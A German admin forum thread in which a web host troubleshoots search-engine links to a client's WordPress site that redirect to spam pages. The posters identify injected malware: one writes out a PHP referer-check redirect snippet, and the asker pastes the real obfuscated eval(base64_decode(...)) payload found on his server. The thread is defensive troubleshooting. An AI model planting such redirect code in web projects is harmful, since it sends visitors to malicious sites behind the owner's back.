Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Google Links werden umgeleitet

Frage Sicherheit Erkennung und -Abwehr

Mitglied: tetzlaf

tetzlaf (Level 1) - Jetzt verbinden

10.09.2012 um 18:43 Uhr, 20750 Aufrufe, 43 Kommentare

Nein, das ist kein Rootkit - mein Ubuntu ist garantiert sauber - und dieses Phänomen betrifft auch nur eine bestimmte Adresse.

So, jetzt die Langversion.
unter www.elektro-schindler.de steckt die Website eines meiner Kunden. Wenn ich die Adresse direkt aufrufe, kommt sie auch. Verwende ich aber Google und deren Trefferliste, lande ich bei http://404.25u.com/ und soll wohl Medikamente kaufen (was zwar auch nett sein kann, aber nicht zielführend ist).
So ne richtige Idee hab ich nicht - wenn der Account einfach gehackt wäre, würde eine eventuelle Weiterleitung doch immer greifen oder?
Rätsel über Rätsel...
43 Antworten
Mitglied: tetzlaf
10.09.2012, aktualisiert 11.09.2012
01.
http://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&ved=0CCUQFjAA&url=http%3A%2F%2Fwww.elektro-schindler.de%2F&ei=vhZOUKGlBoXTsgbWlYGIAQ&usg=AFQjCNEPn9Fi-NqeHfASJQTmxbyhRSlE6g&sig2=IMfVvc7g0_8HsBdWbo_p2g
ist die Linkadresse bei Google...
Bitte warten ..
Mitglied: 60730
10.09.2012, aktualisiert um 19:03 Uhr
rätsel über rätsel

und jetzt die kurzversion....

ähh ja gut von wann ist nochmal der Google cache und war da mal was und was hast du mit dem elektrischen Schindler und der mit dem Kunden zu tun?

Fragen über Fragen
Und eine wäre du bist aber nicht zufällig mit Alfred T. verwandt?
Bitte warten ..
Mitglied: tetzlaf
10.09.2012 um 19:14 Uhr
der elektrische Schindler ist mein Kunde - die Seite läuft auf meinem Server und wird von mir betreut. und mit Alfred Tezlaff (so schreibt der sich nämlich) bin ich leider nicht verwandt
Bitte warten ..
Mitglied: tetzlaf
10.09.2012 um 19:47 Uhr
für Bing gilt das selbe...
Bitte warten ..
Mitglied: Lochkartenstanzer
10.09.2012, aktualisiert um 20:19 Uhr
moin,

Und?

Ich lande immer bei dem Schindler. Was war das Problem?


Mal lynx, chromium, ie, opera, etc. durchprobiert?

lks
Bitte warten ..
Mitglied: tetzlaf
10.09.2012 um 20:22 Uhr
Hä? ich hab zwar eben das letzte Update für Wordpress installiert - lande aber trotzdem noch nicht auf der Seite...
und Du bist echt über Google resp. Yahoo oder Bing auf die Seite gekommen?
Bitte warten ..
Mitglied: 60730
10.09.2012, aktualisiert um 20:26 Uhr
Salü Lockartenstanzer,

[OT]
Hast du noch Lochkarten zum Stanzen? - Ich hab noch n paar 5 1/4" Floppys würde evtl. mir dir tauschen
[/OT]
Zitat von Lochkartenstanzer:
moin,

Und?

Ich lande immer bei dem Schindler. Was war das Problem?
  • Das uns der TO immer noch nicht mitgeteilt hat, welche Buchstabenkombination er in der Suchmaschine eingetippt und welchen Link er angeklickert hat?

Gruss
Bitte warten ..
Mitglied: Lochkartenstanzer
10.09.2012, aktualisiert um 20:29 Uhr
ich weiß zwar nciht, was Du machst, aber wenn ich google nach elektro Schindler suche kommen ganz viele elektro-Schindlers, darunter auch Deiner. Und mit Deinem Link oben lande ich auch auf deinem Schindler.

Hast Du es mal von einem adneren System aus versucht?

lks

PS: Du könntest auch einfach die verbindugn mitsniffen, um zu sehen, was üebr die Leitung geht.
Bitte warten ..
Mitglied: tetzlaf
10.09.2012 um 20:29 Uhr
ok, Eingabe: elektro schindler
Geklickt den link der optisch zu www.elektro-schindler.de zeigt
Bitte warten ..
Mitglied: schattenhacker
10.09.2012 um 20:31 Uhr
Hallo,

entweder ist auf dem Server eine index.htm, index.html, index.php, default oder was auch immer, was unterschiedlich aufgerufen wird. Frage, wie kommt das der Unsinn da rein.
http://www.google.de/url?sa=t&rct=j&q=www.elektro-schindler.de& ...

Gib mal Suchbegriffe ein, schindler, elektro, den Ort, trifft das alle treffer?
gribt ein eine domain mit und ohne www ?

Evtl. musst Du die Seite bei google neu anmelden, aber wenn es bei bing auch so ist.
Ich tippe eher auf einen Fehler entweder innerhalb der Seite oder auf Deinem Server. ( Os? Standort, IP richtig ? DNS Einträge fehlerhaft? )

Aber ist schon komisch.
Bitte warten ..
Mitglied: tetzlaf
10.09.2012 um 20:31 Uhr
genau das ist das Thema - über die url kommt mensch dahin, wo mensch hin will - zu www-elektro-schindler.de aber über die Trefferliste der Suchmaschinen kommt mensch eben zu der anderen Adresse...
Bitte warten ..
Mitglied: Lochkartenstanzer
10.09.2012, aktualisiert um 20:34 Uhr
Dann hast Du ein anderes google. Mein Goolge spuckt mir nur http://www.schindler-elektro.de/ aus.
Bitte warten ..
Mitglied: schattenhacker
10.09.2012 um 20:34 Uhr
Dann mach mal ein google adwords Konto auf und schau mal, ob das da auch verlinkt wird.
Die haben evtl. eg. unserer bettina die Algorithmen versaut.... ??
Bitte warten ..
Mitglied: schattenhacker
10.09.2012 um 20:37 Uhr
jetzt geht es bei mir ( Niedersachsen ) auch.
techn. Problem bei google?
Bitte warten ..
Mitglied: schattenhacker
10.09.2012 um 20:38 Uhr
ne, jetzt wieder nicht.
Ping mal google an.
209.85.148.98 von hier aus.
Bitte warten ..
Mitglied: tetzlaf
10.09.2012 um 20:43 Uhr
Zitat von Lochkartenstanzer:
Dann hast Du ein anderes google. Mein Goolge spuckt mir nur http://www.schindler-elektro.de/ aus.

da musst Du weiter unten schauen - da kommt dann elektro-schindler face-wink
Bitte warten ..
Mitglied: Alchimedes
10.09.2012 um 20:45 Uhr
Hallo,

betreut nen Kunden seine Webseite und kann Tante Google nicht bedienen....


Elektro-Schindler gehostet bei LNC-Regworld-GmbH , IP-83.125.75.107
Und 404.25u.com IP 87.120.41.199 kommt aus Bulgarien...

Hier waere dann ein Eintrag in die hostdatei ne Idee gewesen. Haette ja auch der DNS Eintrag auf dem Router sein koennen.
wg. DNS Chancer und so...


Aber hier war mit Sicherheit der Webbrowsercache schuld... wie TimoBeil schrieb... aeh.. LimboSeil...



P.S: Heinz Schubert hab ich mal persoenlich getroffen... der war ### drauf...
als ich Ihn fragte ob er Alfred Tetzlaff ist

Schoenen Abend
Bitte warten ..
Mitglied: tetzlaf
10.09.2012 um 20:51 Uhr
Zitat von Alchimedes:
Hallo,

betreut nen Kunden seine Webseite und kann Tante Google nicht bedienen....


Elektro-Schindler gehostet bei LNC-Regworld-GmbH , IP-83.125.75.107
Und 404.25u.com IP 87.120.41.199 kommt aus Bulgarien...

Hier waere dann ein Eintrag in die hostdatei ne Idee gewesen. Haette ja auch der DNS Eintrag auf dem Router sein koennen.
wg. DNS Chancer und so...


Aber hier war mit Sicherheit der Webbrowsercache schuld... wie TimoBeil schrieb... aeh.. LimboSeil...



P.S: Heinz Schubert hab ich mal persoenlich getroffen... der war ### drauf...
als ich Ihn fragte ob er Alfred Tetzlaff ist

Schoenen Abend

Alchimedes Du Held!
es löst zwar mein problem in keinster weise - aber wir wissen jetzt, dass die Site aus BG kommt. Was der Browsercache damit zu tun hat bleibt aber auch unklar... (hat er nämlich nicht) aber jetzt nimmt die Diskussion Fahrt auf und ich bin optimistisch, dass wir in einem Anfall von Schwarmintelligenz den richtigen Weg finden werden
Bitte warten ..
Mitglied: Lochkartenstanzer
10.09.2012 um 20:55 Uhr
Zitat von tetzlaf:
> Zitat von Lochkartenstanzer:
> ----
> Dann hast Du ein anderes google. Mein Goolge spuckt mir nur http://www.schindler-elektro.de/ aus.

da musst Du weiter unten schauen - da kommt dann elektro-schindler face-wink

http://www.elektro-schindler.de/ meinte ich natürlich. Ich habe beim copy und Paste den falschen erwischt.

lks

PS: Immer noch nichts
Bitte warten ..
Mitglied: Lochkartenstanzer
10.09.2012 um 21:01 Uhr
Zitat von 60730:
Salü Lockartenstanzer,

[OT]
Hast du noch Lochkarten zum Stanzen? - Ich hab noch n paar 5 1/4" Floppys würde evtl. mir dir tauschen
[/OT]

auch [OT]
Die habe ich irgendwann alle verschenkt, als ich mich aufs Stanzen von 8" und 5,25" Floppies Umschulen hab lassen, weißt ja, wegen doppelter Kapazität und so. Irgendwie ist bei der Umstellugng auf 3" und 3,5"-Floppies was schiefgelaufen. irgendwie funktionierte das bei denen nicht mehr.
[/OT]
Bitte warten ..
Mitglied: Alchimedes
10.09.2012 um 21:16 Uhr
Alchimedes Du Held!
es löst zwar mein problem in keinster weise - aber wir wissen jetzt, dass die Site aus BG kommt. Was der Browsercache damit
zu tun hat bleibt aber auch unklar... (hat er nämlich nicht) aber jetzt nimmt die Diskussion Fahrt auf und ich bin
optimistisch, dass wir in einem Anfall von Schwarmintelligenz den richtigen Weg finden werden

Nabend,

ich schmeiss hier tante Goggle an und kann Elektro Schindler reinhaemmern und sofort den ersten Treffer...

Aber vielleicht war das ja auch die Absicht Deines Postings....

So kommt man halt auch zum Google-Ranking... SEO Massnahmen fuer Dummies.

Gruss
Bitte warten ..
Mitglied: tetzlaf
10.09.2012 um 21:22 Uhr
Zitat von Alchimedes:
> Alchimedes Du Held!
> es löst zwar mein problem in keinster weise - aber wir wissen jetzt, dass die Site aus BG kommt. Was der Browsercache
damit
> zu tun hat bleibt aber auch unklar... (hat er nämlich nicht) aber jetzt nimmt die Diskussion Fahrt auf und ich bin
> optimistisch, dass wir in einem Anfall von Schwarmintelligenz den richtigen Weg finden werden

Nabend,

ich schmeiss hier tante Goggle an und kann Elektro Schindler reinhaemmern und sofort den ersten Treffer...

Aber vielleicht war das ja auch die Absicht Deines Postings....

So kommt man halt auch zum Google-Ranking... SEO Massnahmen fuer Dummies.

Gruss

schön wärs ja (aber, das würde ich garantiert intelligenter anstellen) ich bin mir aber nicht sicher, ob Du das problem schon erfasst hast? Ich erklärs Dir aber gerne nochmal:
www.elektro-schindler.de (nicht umgekehrt oder sonst wie) ist, wenn man die Adresse in den Browser eingibt, die Site, die man finden sollte. Gibst Du jetzt elektro-schindler (auch ohne -) ein und suchst den Treffer "elektro-schindler.de" dann wirst Du feststellen, dass da zwar www.elektro-schindler.de steht - der link Dich aber ganz woanders hinführt.
Unabhängig vom cache!
und nu schmeiß mal Tante Google oder Yahoo oder Bing an... und lästere erst hinterher!
Bitte warten ..
Mitglied: Lochkartenstanzer
10.09.2012 um 21:26 Uhr
Zitat von tetzlaf:
finden sollte. Gibst Du jetzt elektro-schindler (auch ohne -) ein und suchst den Treffer "elektro-schindler.de" dann
wirst Du feststellen, dass da zwar www.elektro-schindler.de steht - der link Dich aber ganz woanders hinführt.
Unabhängig vom cache!
und nu schmeiß mal Tante Google oder Yahoo oder Bing an... und lästere erst hinterher!

Dann mußt Du wirklich ein anderes Google haben. Hier kommt nur der reine Link raus.

Jetzt probier es doch mal mit einem anderen rechner noder aus einem andren Netz heraus aus. Dann sehen wir ja, ob Du auf beiden rechnern das gleiche google hast.

Ansonsten frag mal bei Bettina nach, wie man einen Streisand-Effekt erzeugt, der zu einem besseren Google-Ranking führt.

lks
Bitte warten ..
Mitglied: Pjordorf
10.09.2012 um 21:50 Uhr
Hallo lks,

Zitat von Lochkartenstanzer:
Dann mußt Du wirklich ein anderes Google haben. Hier kommt nur der reine Link raus.
Nene. Im Browserfenster steht ja auch nur das schon mehrfach erwähnte http://www.elektro-schindler.de/ was ja auch das richtige ist. Bitte nur das sehen was im Browserfenster dargestellt wird. Der link von Google dazu ist aber tatsächlich falscher Elektro-Schindler link und der landet irgendwann auf die Falsche Seite.

@tetzlaf:
Du solltest dir mal genauer anschauen was in diesem SearchResultString von Google drin ist und notfalls bei Google beschwerde einlegen. das es nichts geheimnisvolles ist zeigt auch dies gefundene Änderung an Google Search Referrals

Gruß,
Peter
Bitte warten ..
Mitglied: Lochkartenstanzer
10.09.2012 um 21:50 Uhr
hallo,

Nachdem ich es mal bei Bing versucht habe, bin ich jetzt auch auf diese Umleitung gestoßen. Interessanterweise taucht in dem Bingergebnis folgender Text auf:

    Elektro Schindler | Wenns besser werden soll 
    www.elektro-schindler.de 
 
    Using an outdated browser makes your computer unsafe. For a safer, faster, more enjoyable user experience, please update your browser today or try a newer browser.
wobei der link korrekt zur Schindler-Seite führt.

Nachdem Du wordpress verwendest, tippe ich mal, daß Du Dir was eingefangen hast.

Mein Tip: Frisch aufsetzen udn vor allem Wordpress in die Tonne schmeißen.

lks
Bitte warten ..
Mitglied: Lochkartenstanzer
10.09.2012, aktualisiert 12.09.2012
Zitat von Pjordorf:
richtige ist. Bitte nur das sehen was im Browserfenster dargestellt wird. Der link von Google dazu ist aber tatsächlich
[http://www.google.de/url?sa=t&rct=j&q=elektro%20schindler&source=web&cd=7&cad=rja&ved=0CEkQFjAG&url=http%3A%2F%2Fwww.elektro-schindler.de%2F&ei=hUFOUJyVM4zItAaGzIHABw&usg=AFQjCNEPn9Fi-NqeHfASJQTmxbyhRSlE6g
falscher Elektro-Schindler link] und der landet irgendwann auf die Falsche Seite.


Du kannst hellsehen, was für ein Link mir google gibt? Alle Achtung. Ich kann schon unterscheiden, was der Browser darstellt und was ich als Link bekomme. Ein lynx --dump http://www.google.de/search?q=elektro+schindler gibt Dir das sauber raus.

Aber Du hast ein Problem mit Deinem Server. Ich würde den mal durchchecken.

lks


Nachtrag: Dein google-Link oben führt mich auch zu der korrekten Seite.

Nachtrag2: In Firefox kannst Du Dir Mit CTRL-U den Seitenquelltext anzeigen lassen und da steht bei mir eindeutig ein
... href="http://www.elektro-schindler.de/" ...
drin.
Bitte warten ..
Mitglied: 60730
10.09.2012 um 21:59 Uhr
Zitat von Lochkartenstanzer:
> Zitat von 60730:
> ----
> Salü Lockartenstanzer,
>
> [OT]
> Hast du noch Lochkarten zum Stanzen? - Ich hab noch n paar 5 1/4" Floppys würde evtl. mir dir tauschen
> [/OT]

auch [OT]
Die habe ich irgendwann alle verschenkt, als ich mich aufs Stanzen von 8" und 5,25" Floppies Umschulen hab lassen,
weißt ja, wegen doppelter Kapazität und so. Irgendwie ist bei der Umstellugng auf 3" und 3,5"-Floppies was
schiefgelaufen. irgendwie funktionierte das bei denen nicht mehr.
[/OT]

[OT²]
Merde aber auch, weil mein Väterchen hat seine H0 Loks und Wagen allesamt in einem groooooosen Schrank, der ursprünglich mal für Lochkarten war und der hat bald Burzeltaach... In der Bucht gibts aber grad welche (leider von Ariola)
[/OT²]

Gruß
Bitte warten ..
Mitglied: Lochkartenstanzer
10.09.2012 um 22:03 Uhr
Zitat von 60730:
[OT²]
Merde aber auch, weil mein Väterchen hat seine H0 Loks und Wagen allesamt in einem groooooosen Schrank, der ursprünglich
mal für Lochkarten war und der hat bald Burzeltaach... In der Bucht gibts aber grad welche (leider von Ariola)
[/OT²]

Oh, dann schau ich mal, ob alte Kollegen, die da mal mitgestanzt haben noch welche haben. Mach dir aber keine großen Hoffnungen. Ich melde mich, falls ich was auftreiben könnte.

'nacht.

lks
Bitte warten ..
Mitglied: Alchimedes
10.09.2012 um 22:05 Uhr
Hallo,

stimmt.

Der fuenfte Eintrag fuehrt auf die falsche Seite.
Und die aendert sich... mal Spielcasino... mal Sexangebote...

Die Suchmaschine nennt sich butabital search hat die IP 87.120.41.199 also wie vorher festgestellt.


Ich glaub das Problem ist der Name der Webseite... da schmeisst Tante Google was durcheinander.
Es gibt elektro-schindler, elektroschindler, schindlerelektro... e.t.c.



Und ueber den Quelltext von der Webseite find ich jetzt auch nichts ungewoehnliches....aber seh ja den php code hier nicht...

Wuerde hier mal Tante Google anschreiben, vieleicht sogar als attackierende Webseite melden.. den
mit <table cellpadding="0" cellspacing="0" wird was versteckt...

Aber reine Vermutung.


Gruss
Bitte warten ..
Mitglied: Lochkartenstanzer
10.09.2012, aktualisiert 12.09.2012
Zitat von Alchimedes:
Wuerde hier mal Tante Google anschreiben, vieleicht sogar als attackierende Webseite melden.. den
mit <table cellpadding="0" cellspacing="0" wird was versteckt...

Nee, google udn bing liefern korrekte URLs aus: http://www.elektro-schindler.de das ist das, was ich im HTMl-Code sehe, sowohl mit lynx, als auch mit Firefox.

Wenn ich üebr Bing auf die schindlerseite komme, gibt es ein Redirekt (Ich habe jezt keinen sniffer angeworfen, ist aber auch egal).

Wenn ich direkt oder über google reinkomme, bleibe ich auf der Seite.

Wie ich schon sagte: Check Deinen Server! Wordpress ist sehr anfällig. da sind mehr Löcher drin als in einem Schweizer Käse und das Zeug ist total verbuggt.

lks
Bitte warten ..
Mitglied: Lochkartenstanzer
10.09.2012, aktualisiert um 22:47 Uhr
Schau mal da [Edit] und da. [/Edit]

Also noch ein letztes Mal: CHECK DEINEN SERVER.

Sorry, daß ich so laut wurde.

lks


Nachtrag:

Nein, das ist kein Rootkit - mein Ubuntu ist garantiert sauber - und dieses Phänomen betrifft auch nur eine bestimmte Adresse.

Das muß gar kein rootkit sein. Die haben Dir nur mit Worpress ein paar Skripten untergeschoben.
Bitte warten ..
Mitglied: Lochkartenstanzer
10.09.2012, aktualisiert 11.09.2012
Übrigens:

25u ist ein dyndns-Provider (Sieht man wenn man auf http://www.25u.com/ geht). udn 404.25u.com ist einfach die 404-Seite von deren Webserver, wenn man auf eine nicht existente 25u-Adresse auflösen will.

Und nachdem Google und Bing die korrekten URLs liefern, steckt bei Dir im Wordpress irgendetwas drin, das bei passendem Referrer die Seiten umleitet.

[Rant] BTW: Wie kann man mit Wordpress Firmenimage-Seiten machen? Da ist ja so ein Murks vorprommamiert. Für Private Blogs mag das ja noch angehen aber Firmenseiten?
[/Rant]


Jetzt aber gute Nacht.

lks
Bitte warten ..
Mitglied: schattenhacker
10.09.2012, aktualisiert um 22:43 Uhr
hallo,

ja komisch, aber wenn Du mal eine Macke auf dem Server hattest (!) damals, vor ein paar tagen, hat google das immer noch.
Evtl. holt sich bing die Daten auch von google. bei yahoo ist es auch so.
Hast Du denn keine keywords, mit deren Hilfe man auch einen treffer landet?
Wieso findet man die Seite nur mit direkter eingabe der domain?
wenn Du z.B. kjdskdjfkjdfoiooo-1a-super-jajaj_tralala
als Suchbegriff auf der seite hättest, könntest Du schauen, ob dann auch ein komischer link kommt.
Also wenn Dein Server ok ist, dann schau mal, ob da vorhher eine Manipulation war.
Wie gesagt, Seite bei google neu anmelden, kann aber Tage dauern.
Oder schreib denen mal...

Halt uns auf dem Laufenden.

Ich hefte derweil die Floppies weiter ab
Bitte warten ..
Mitglied: schattenhacker
10.09.2012, aktualisiert um 22:57 Uhr
also fireball liefert grade ein korrektes Ergebnis.
Kennt jemand noch andere Suchmaschinen?
Also web.de und lycos verhalten sich normal. Evtl. ist es zeitabhängig? Wer weiss, was Du dir da eingefangen hast.
Bitte warten ..
Mitglied: Lochkartenstanzer
10.09.2012 um 22:53 Uhr
Zitat von schattenhacker:
Also wenn Dein Server ok ist, dann schau mal, ob da vorhher eine Manipulation war.

Sein Server kann nicht o.k. sein. Wenn ich mir referrer bing da drauf lande, werde ich auf 25u weitergeleitet, d.h. Die Malware ist immer noch auf dem Serrver. da hilft alles Anschreiben an google nichts.


lks
Bitte warten ..
Mitglied: Lochkartenstanzer
10.09.2012, aktualisiert um 22:58 Uhr
Zitat von schattenhacker:
also fireball liefert grade ein korrektes Ergebnis.
Kennt jemand noch andere Suchmaschinen?

Das Problem sind nicht die Suchmaschinen, wie ich schon sagte. Auf der Maschine steckt irgendwo ein base64-Codierstes Skript, daß so ähnlich aussieht:

$referer=$_SERVER['HTTP_REFERER']; 
    $uag=$_SERVER['HTTP_USER_AGENT']; 
    if ($uag) 
       if (stristr($referer,"yahoo") or 
       stristr($referer,"bing") or 
       stristr($referer,"rambler") or 
       stristr($referer,"gogo") or 
       stristr($referer,"live.com")or 
       stristr($referer,"aport") or 
       stristr($referer,"nigma") or 
       stristr($referer,"webalta") or 
       stristr($referer,"begun.ru") or 
       stristr($referer,"stumbleupon.com") or 
       stristr($referer,"bit.ly") or 
       stristr($referer,"tinyurl.com") or 
       preg_match("/yandex\.ru\/yandsearch\?(.*?)\ 
       &amp;lr\=/",$referer) or 
       preg_match ("/google\.(.*?)\/url/",$referer) or 
       stristr($referer,"myspace.com") or 
       stristr($referer,"facebook.com") or 
       stristr($referer,"aol.com")) 
     if (!stristr($referer,"cache") or 
     !stristr($referer,"inurl")) 
           header("Location: http://irgendwo-bei.25u.com/"); exit(); 
   } 
lks
Bitte warten ..
Mitglied: schattenhacker
10.09.2012 um 22:58 Uhr
ja da hast Du recht.....
Hoffentlich ist es wordpress... dann kann er die Seite neu machen und rechnung schreiben.
Bitte warten ..
Mitglied: Lochkartenstanzer
10.09.2012, aktualisiert um 23:03 Uhr
Zitat von schattenhacker:
ja da hast Du recht.....
Hoffentlich ist es wordpress... dann kann er die Seite neu machen und rechnung schreiben.

Mit Rechnung schreiben wäre ich vorsichtig. Er hostet die Seite und ist damit dafür verantwortlich, daß er für die Sicherheit sorgt. Und Wordpress würde ich mal unter "grob fahrlässig" einordnen. Am besten als Lehrgeld abschreiben und was ordentliches machen. So wie die Seite aussieht sind da statische Webseiten das geeigneste. Es muß ja nicht mit vi handgeschnitzt sein, aber wordpress ist dafür definitiv ungeeignet.

lks
Bitte warten ..
Mitglied: tetzlaf
11.09.2012 um 11:08 Uhr
dies:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly93d3cuc3RscC40cHUuY29tLyIpOw0KZXhpdCgpOw0KfQp9DQp9DQp9DQp9"));

hab ich vielfach gefunden - interessanterweise hat das Löschen des Scripts immer nur kurzzeitig was gebracht - irgendwo im System steckt ein anderes Script, das gelöschte Einträge erneuert...
btw - das Ding kam nicht aus Bulgarien, sondern aus China von china315.com

Im Ergebnis schieße ich die Site ab und mach sie neu - geht schneller... und ist auch sicherer - Danke für Eure Hilfe!
Bitte warten ..
Mitglied: sky5000i
11.09.2012 um 12:18 Uhr
Zitat von tetzlaf:
der elektrische Schindler ist mein Kunde - die Seite läuft auf meinem Server und wird von mir betreut. und mit Alfred Tezlaff
(so schreibt der sich nämlich) bin ich leider nicht verwandt

Hast du schon geschaut ob die Seiten umgeschrieben wurden????
Solltest mal schauen ob der Quellcode noch so ist wie du in geschrieben hast....

Ist bei mir auch schon gewesen siehe auch meine .htaccess Frage

Mit freundlichen Grüßen
Sky
Bitte warten ..
Mitglied: adminst
11.09.2012 um 14:03 Uhr
Hallo zusammen
Dieser DNS Anbieter wurde auch infiziert. Er leitet manche Anfragen an URLs welche den
Java Bug ausznutzen. Stellt sicher, dass ihr die aktuelle Java Version installiert habt etc....

adminst
Bitte warten ..
Mitglied: Lochkartenstanzer
11.09.2012 um 14:56 Uhr
Zitat von tetzlaf:
Im Ergebnis schieße ich die Site ab und mach sie neu - geht schneller... und ist auch sicherer - Danke für Eure Hilfe!


naja, wenigstens weißt Du's jezt. Und bitte mach Dir Gedanken wie Du solch einfache Seiten ohne fehleranfälliges PHP & Wordpress gestalten kannst. Da gehört wirklich nicht viel dazu. Die Seitenbesucher werdens Dir danken.

Denk auch dran, die Logfiles auszuwerten um ggf. ehemalige Seitenbesucher zu warnen. Da werden einige sich etwas eingefangen haben.

Und auch daran denken, den Beitrag als gelöst zu setzen.

lks
Bitte warten ..
Mitglied: Lochkartenstanzer
11.09.2012 um 15:09 Uhr
Webseiten prüfen? Da gibt es jetzt etwas von eco: Initiative-S: Kostenloser Website-Check für kleine Unternehmen.

Ich weiß aber nicht, ob das etwass taugt.

lks
Bitte warten ..
Neuester Wissensbeitrag
Humor (lol)

Linkliste für Adventskalender

(3)

Information von nikoatit zum Thema Humor (lol) ...

Ähnliche Inhalte
Erkennung und -Abwehr
Mehr als 1 Million Google Accounts von Malware Gooligan gekapert

Link von Frank zum Thema Erkennung und -Abwehr ...

Windows Server
Google Chrome Web Store Problem auf Terminal Farm

Frage von dakoerry zum Thema Windows Server ...

Internet
Google Down: Google-Dienste in Zentraleuropa gestört (2)

Link von runasservice zum Thema Internet ...

Heiß diskutierte Inhalte
Exchange Server
gelöst Exchange 2010 Berechtigungen wiederherstellen (20)

Frage von semperf1delis zum Thema Exchange Server ...

Windows Server
DHCP Server switchen (20)

Frage von M.Marz zum Thema Windows Server ...

Hardware
gelöst Negative Erfahrungen LAN-Karten (19)

Frage von MegaGiga zum Thema Hardware ...

Exchange Server
DNS Einstellung - zwei feste IPs für Mailserver (15)

Frage von ivan0s zum Thema Exchange Server ...